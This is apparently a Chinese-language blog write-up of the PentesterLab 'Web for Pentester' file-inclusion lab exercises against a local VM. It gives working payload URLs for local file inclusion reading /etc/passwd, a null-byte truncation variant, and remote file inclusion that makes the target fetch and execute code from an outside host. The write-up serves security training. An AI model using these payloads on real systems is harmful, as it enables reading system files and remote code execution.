Web for pentester_writeup之File Include篇

Web for pentester_writeup之File Include篇

File Include(文件包涵)

Example 1

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135652230-964502428.png)

加一个单引号

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135705087-50141791.png)

从报错中我们可以获取如下信息: 当前文件执行的代码路径: `/var/www/fileincl/example1.php` 文件包含代码引用函数 `include()` 代码引用的文件路径:`include_path`= `/usr/share/php:/usr/share/pear`

>Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example1.php?page=../../../../../../../../etc/passwd`

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135803155-2088724461.png)

Payload 2 (远程文件包含RFI)
http://192.168.219.136/fileincl/example1.php?page=https://assets.pentesterlab.com/test_include.txt

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135812288-1016362721.png)

其中https://assets.pentesterlab.com/test_include.txt是官方给的一个测试例子,也可以自己构建,在txt中写入想执行的代码

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135821873-1400869374.png)

Example 2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135841490-291369101.png)

没有后缀名了,同样添加一个单引号查看报错信息

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135915321-2021662260.png)

发现函数调用的php文件变成了`include(intro'.php)`,我们可以使用%00截断来实现本地文件包含 >Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example2.php?page=../../../../../../../../etc/passwd%00`

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135944317-1388578621.png)

Payload 2 (远程文件包含RFI)
http://192.168.219.136/fileincl/example2.php?page=https://assets.pentesterlab.com/test_include.txt?blah=
或者使用&blah=当文件路径传参符号为&号时

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135952093-207954802.png)

Payload 3 (远程文件包含RFI,也可以在主机10.8.0.61自己构造一个phpinfo.php的文件,去掉后缀访问)
http://192.168.219.136/fileincl/example2.php?page=http://10.8.0.61/phpinfo

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135958885-314395672.png)

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808140114651-718114185.png)

posted @ 2019-08-08 14:12  只言  阅读(490)  评论(0编辑  收藏  举报